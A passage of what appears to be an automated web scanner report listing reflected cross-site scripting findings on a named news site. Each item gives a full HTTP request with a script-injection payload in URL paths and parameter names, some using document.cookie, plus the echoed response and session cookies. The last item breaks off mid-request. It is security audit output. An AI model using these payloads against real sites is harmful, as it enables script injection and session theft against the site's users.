4.192. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f50"><script>alert(1)</script>fe8bd646812 was submitted in the REST URL parameter 4. This input was echoed as e2f50\"><script>alert(1)</script>fe8bd646812 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-halle2f50"><script>alert(1)</script>fe8bd646812/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5cgd55tpqcii02hiik54n184h3; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-halle2f50\"><script>alert(1)</script>fe8bd646812/x22'; }); return true;" >
...[SNIP]...

4.193. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 317bf"><script>alert(1)</script>7cea82c0756 was submitted in the REST URL parameter 5. This input was echoed as 317bf\"><script>alert(1)</script>7cea82c0756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22317bf"><script>alert(1)</script>7cea82c0756 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=osrr4es1khehpbsg2bdcc0cic4; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22317bf\"><script>alert(1)</script>7cea82c0756'; }); return true;" >
...[SNIP]...

4.194. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fad"><script>alert(1)</script>848aa3101ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2fad\"><script>alert(1)</script>848aa3101ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22?d2fad"><script>alert(1)</script>848aa3101ef=1 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=69d27e147f4cc463cfb778d7ebaddd75
Set-Cookie: PHPSESSID=5picprkcup404b60pv5q8khbh4; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22?d2fad\"><script>alert(1)</script>848aa3101ef=1'; }); return true;" >
...[SNIP]...

4.195. http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee649"><script>alert(1)</script>343c7fa038d was submitted in the REST URL parameter 6. This input was echoed as ee649\"><script>alert(1)</script>343c7fa038d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.phpee649"><script>alert(1)</script>343c7fa038d HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:22:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 23:22:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 23:22:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
ect.requireSession(function() { window.location='/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.phpee649\"><script>alert(1)</script>343c7fa038d'; }); return true;" >
...[SNIP]...

4.196. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f700"><script>alert(1)</script>6bdd23bb74f was submitted in the REST URL parameter 1. This input was echoed as 4f700\"><script>alert(1)</script>6bdd23bb74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4f700"><script>alert(1)</script>6bdd23bb74f/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content4f700\"><script>alert(1)</script>6bdd23bb74f/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.197. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b75c3"><script>alert(1)</script>5f63b93ea21 was submitted in the REST URL parameter 2. This input was echoed as b75c3\"><script>alert(1)</script>5f63b93ea21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb75c3"><script>alert(1)</script>5f63b93ea21/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsb75c3\"><script>alert(1)</script>5f63b93ea21/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.198. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 293b2"><script>alert(1)</script>c4fe96232b6 was submitted in the REST URL parameter 3. This input was echoed as 293b2\"><script>alert(1)</script>c4fe96232b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups293b2"><script>alert(1)</script>c4fe96232b6/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups293b2\"><script>alert(1)</script>c4fe96232b6/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.199. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66f4"><script>alert(1)</script>99dd70eac0b was submitted in the REST URL parameter 4. This input was echoed as f66f4\"><script>alert(1)</script>99dd70eac0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/libf66f4"><script>alert(1)</script>99dd70eac0b/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/libf66f4\"><script>alert(1)</script>99dd70eac0b/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.200. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64982"><script>alert(1)</script>2aae682cb86 was submitted in the REST URL parameter 5. This input was echoed as 64982\"><script>alert(1)</script>2aae682cb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css64982"><script>alert(1)</script>2aae682cb86/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css64982\"><script>alert(1)</script>2aae682cb86/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.201. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ad2"><script>alert(1)</script>281b5578e7d was submitted in the REST URL parameter 6. This input was echoed as 56ad2\"><script>alert(1)</script>281b5578e7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond56ad2"><script>alert(1)</script>281b5578e7d/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond56ad2\"><script>alert(1)</script>281b5578e7d/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.202. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6aa"><script>alert(1)</script>84c0efbbd58 was submitted in the REST URL parameter 7. This input was echoed as 8a6aa\"><script>alert(1)</script>84c0efbbd58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css8a6aa"><script>alert(1)</script>84c0efbbd58?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css8a6aa\"><script>alert(1)</script>84c0efbbd58?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.203. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c399a"><script>alert(1)</script>9ef6eff5d83 was submitted in the REST URL parameter 1. This input was echoed as c399a\"><script>alert(1)</script>9ef6eff5d83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc399a"><script>alert(1)</script>9ef6eff5d83/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
